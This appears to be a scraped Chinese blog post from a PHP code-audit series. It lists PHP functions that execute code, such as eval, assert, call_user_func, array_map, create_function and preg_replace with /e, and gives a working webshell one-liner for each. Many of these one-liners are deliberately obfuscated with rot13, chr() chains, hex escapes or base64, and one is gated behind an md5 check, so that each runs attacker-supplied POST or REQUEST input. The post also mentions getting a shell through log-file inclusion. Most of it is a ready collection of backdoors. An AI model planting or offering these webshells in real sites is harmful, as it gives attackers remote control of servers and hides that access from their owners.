2. 程式人生 > >PHP程式碼審計之路——5.程式碼執行及一句話木馬總結

PHP程式碼審計之路——5.程式碼執行及一句話木馬總結

阿新 發佈:2019-01-31
  • mixed eval ( string $code )
把字串 code 作為PHP程式碼執行
  • bool assert ( mixed $assertion [, string $description ] ) PHP 5
  • bool assert ( mixed $assertion [, Throwable $exception ] ) PHP 7
如果 assertion 是字串,它將會被 assert() 當做 PHP 程式碼來執行。
  • array array_map ( callable $callback , array $array1 [, array $... ] )
  • array_map():返回陣列,是為 array1 每個元素應用 callback函式之後的陣列。 callback 函式形參的數量和傳給 array_map() 陣列數量,兩者必須一樣。
  • mixed call_user_func ( callable $callback [, mixed $parameter [, mixed $... ]] )
第一個引數 callback 是被呼叫的回撥函式,其餘引數是回撥函式的引數
  • mixed call_user_func_array ( callable $callback , array $param_arr )
把第一個引數作為回撥函式(callback)呼叫,把引數陣列作(param_arr)為回撥函式的的引數傳入
  • string create_function ( string $args , string $code )
建立一個匿名函式 、
  • mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )
搜尋subject中匹配pattern的部分, 以replacement進行替換 7.0.0 不再支援 /e修飾符。 請用 preg_replace_callback() 代替。 5.5.0 /e 修飾符已經被棄用了。使用 preg_replace_callback() 代替。 1. eval 2. assert 3.call_user_func 4. array_map 5. create_function 6.變數 7. preg_replace 1. eval 
<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>   #page
<?php $c = str_replace('b', '', '_bbPbbbbObSbbbbbTbbb');$a = $$c;eval($a['mima']);?>
2. assert 
assert($_POST[c]);
或者
assert('assert(eval($_POST[page]));');//必須single-queto
assert('eval($_POST[page]);');//必須single-queto
3.call_user_func、call_user_func_array 
call_user_func('assert', "phpinfo()");
call_user_func(base64_decode('YXNzZXJ0'), "phpinfo()");

call_user_func_array('assert',array('system(dir)'));

4.array_map 
<?php array_map("as\x73\x65rt",(array)$_REQUEST['caidao']);?>

<?php
strcasecmp(md5($_GET['qid']),'aaa1fb894b5716d60771e6f230b67e6c')?array_map("as\x73ert",(array)$_REQUEST['caidao']):next;
?>

abcleo 5. create_function 
<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>

簡單翻譯 $_uU=chr; $_cC=eval(_POST[1]); $_fF=create_function; $_=create_funtion("",$cC); @$_(); 6.變數 
@$_GET[a]($_GET[b]);

7. preg_replace 
preg_replace('/some/e',$_POST[c],'some');
如有興趣深入,推薦文章 題外話,還有更好玩的,利用LFI及各種日誌檔案,如apahce acces日誌來get shell,有空再寫,別忘記了。

相關推薦

PHP程式碼審計——5.程式碼執行一句話木馬總結

mixed eval ( string $code ) 把字串 code 作為PHP程式碼執行 bool assert ( mixed $assertion [, string $description ] ) PHP 5bool assert ( mixed $asse

小白的程式碼審計(一)

一般框架中可訪問的方法都要求屬性為public並且方法名要符合命名規範才能被瀏覽器訪問到,在ThinkPHP中預設的規則要求就是隻要方法名為public就可以被訪問。(如SlightPHP中不僅需要方法為public,還需要方法名字首為page.具體可以參考各框架說明)。這樣我們就可以完美的定位檔案和方法了。

PHP程式碼審計命令執行

成功執行. 在具體分析細節之前,先說一下create_function()。 create_function返回一個字串的函式名, 這個函式名的格式是: "\000_lambda_" . count(anonymous_functions)++    我們來看看create_function的實現步驟:

《程式設計珠璣》程式碼5:格式信函程式設計----將資料和程式碼分開的好處

我們開啟一些網站,經常會看到不同客戶專屬資訊,例如: Welcome back, Jane! We hope that you and all the members of the Public family are constantly reminding your neighbers the

PHP程式碼審計————1、PHP程式碼審計環境搭建

前言本系列部落格,主要講解PHP程式碼審計。從環境搭建到具體的實戰分析將會一步一步深入學習,希望可以對大家有所幫助。審計環境搭建作業系統:Window 7軟      件:phpstudy、VMware workstations14、seay 程式碼審計軟體、notepad+

程式碼審計】CLTPHP_v5.5.3後臺任意檔案刪除漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

程式碼審計】CLTPHP_v5.5.3前臺XML外部實體注入漏洞分析

0x01 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/login/index

程式碼審計】CLTPHP_v5.5.3後臺任意檔案下載漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

程式碼審計】CLTPHP_v5.5.3後臺目錄遍歷漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

程式碼審計】CLTPHP_v5.5.3 前臺任意檔案上傳漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

程式碼審計】OTCMS_PHP_V2.83_程式碼執行漏洞分析

  0x00 環境準備 OTCMS官網:http://otcms.com 網站原始碼版本:網鈦CMS PHP版 V2.83 [更新於2017.12.31] 程式原始碼下載:http://d.otcms.com/php/OTCMS_PHP_V2.83.rar 測試網站首頁:  

程式碼審計】YzmCMS_PHP_v3.6 程式碼執行漏洞分析

  0x00 環境準備 YzmCMS官網:http://www.yzmcms.com/ 程式原始碼下載:http://pan.baidu.com/s/1pKA4u99 測試網站首頁:   0x01 程式碼分析 1、檔案位置: /application/admin/contro

Java程式碼

程式碼塊 程式碼塊是一種常見的程式碼形式。它用大括號“{ }”將多行程式碼封裝在一起,形成一個獨立的程式碼區域,這就構成了程式碼塊。程式碼塊的格式如下: { //程式碼塊 } 程式碼塊有四種: (1)普通程式碼塊。 (2)構造程式碼塊。 (3)靜態程式碼塊。 (4)同步程

[遊戲程式碼]求生外掛:人物角色選擇

#define PLUGIN_VERSION "1.0 Special" #define PLUGIN_NAME "[紫冰]人物選擇外掛" #define DEBUG 0 // includes #include <sourcemod> #include

程式碼審計bluecms1.6後臺SQL注入

bluecm1.6版本後臺存在SQL注入 漏洞點連結: http://127.0.0.1/bluecms_v1.6_sp1/uploads/admin/nav.php?act=edit&navid=1 程式碼: elseif($act=='edit') {

Jquery 萬行程式碼解析(一)—jquery物件

從今天開始讀Jquery原始碼,並開始解析原始碼的思路,記下來備忘。後邊會整理出一個完整的。 Write less,Do more!—Jquery理念 想必只要是學過前端,學過html+css+js這一套用來寫網頁的技術的人必然不能不知道大名鼎鼎的J

《python機器學習實踐-從零開始通往kaggle競賽程式碼Python 3.6 版)》chapter1.1

import pandas as pd #匯入pandas 庫 df_train = pd.read_csv('../Datasets/Breast-Cancer/breast-cancer-train.csv') #讀取目錄下的資料,如果程式碼與檔案路徑不在一起,則需要另行設定 df_test = pd

程式碼UTF82:解決VS編譯中的C1071錯誤

繼上一次解決了C4819的警告(點選這裡開啟)之後,繼續之後又遇到編碼問題。首先是有一個檔案編譯出現錯誤,提示未定義變數,但是該檔案改為GBK編碼後,編譯是正確的,最後通過逐行排除法,發現將某行註釋後增加一個換行可以正確編譯,暫且忽略;然後,又遇到了這個C1071錯誤,提示“

程式碼簡化

這段時間一直在啃演算法,很久都沒有寫過文章了,主要是演算法這東西被人反反覆覆寫,水平高低的文章都有,我也就不想湊這個熱鬧,當然了,遇到有意思的問題,還是想記一下的。 以上與我要寫的東西沒什麼關聯,我也就不廢話了。 策略模式 在現在的開發中,大概有2

程式碼審計seacms v6.45 前臺Getshell 復現分析

1.環境: php5.5.38+apache+seacms v6.45 seacms目錄結構: │─admin //後臺管理目錄 │ │─coplugins //已停用目錄 │ │─ebak //帝國備份王資料備份 │ │─editor //編輯器 │ │─img //後臺靜態檔案 │ │